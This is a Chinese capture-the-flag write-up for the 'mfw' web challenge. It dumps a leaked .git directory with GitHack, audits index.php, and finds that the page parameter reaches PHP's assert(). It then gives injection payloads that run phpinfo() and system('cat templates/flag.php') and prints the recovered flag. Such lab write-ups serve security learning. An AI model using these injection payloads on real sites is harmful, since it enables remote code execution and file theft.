攻防世界-mfw

打開題目,讓我們看看about這個鏈接是什麼,我們看到了這個

 

 他說他寫這個站點用了git、php、bootstrap這很容易就能讓我們想到,git源碼泄露,這我們直接掏出githack,

python GitHack.py //220.249.52.133:46599/.git        

  運行完之後,我們就可以在GitHack文件中的dist中看到站點

 

 我們先看下文件,templates中有

四個文件,其中有flag.php但是打開不是flag,於是我們打開index.php

源碼審計一波

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>
<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		
		<title>My PHP Website</title>
		
		<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" />
	</head>
	<body>
		<nav class="navbar navbar-inverse navbar-fixed-top">
			<div class="container">
		    	<div class="navbar-header">
		    		<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
		            	<span class="sr-only">Toggle navigation</span>
		            	<span class="icon-bar"></span>
		            	<span class="icon-bar"></span>
		            	<span class="icon-bar"></span>
		          	</button>
		          	<a class="navbar-brand" href="#">Project name</a>
		        </div>
		        <div id="navbar" class="collapse navbar-collapse">
		          	<ul class="nav navbar-nav">
		            	<li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li>
		            	<li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li>
		            	<li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li>
						<!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> -->
		          	</ul>
		        </div>
		    </div>
		</nav>
		
		<div class="container" style="margin-top: 50px">
			<?php
				require_once $file;
			?>
			
		</div>
		
		<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" />
		<script src="//cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" />
	</body>
</html>

  asser()函數會將讀入的代碼當作php執行

我們先捋一下思路:

我們首先繞過assert(“strpos(‘$file’, ‘..’) === false”) or die(“Detected hacking attempt!”);

我們先將strpos閉合,然後將後面的語句’..’)===false”) or die (“Detected hacking attempt!”)注釋掉

然後構造payload:?page=’.phpinfo();//然後有回顯

 

 既然phpinfo()函數都可以執行,那我們將phpinfo();//

因為我們有源碼,所以我們直接構造payload: ?page=’).system(“cat templates/flag.php”);//

查看源碼我們獲得flag

 

 

cyberpeace{8a17fc536dec4eb9fccf94c75e4e25e8}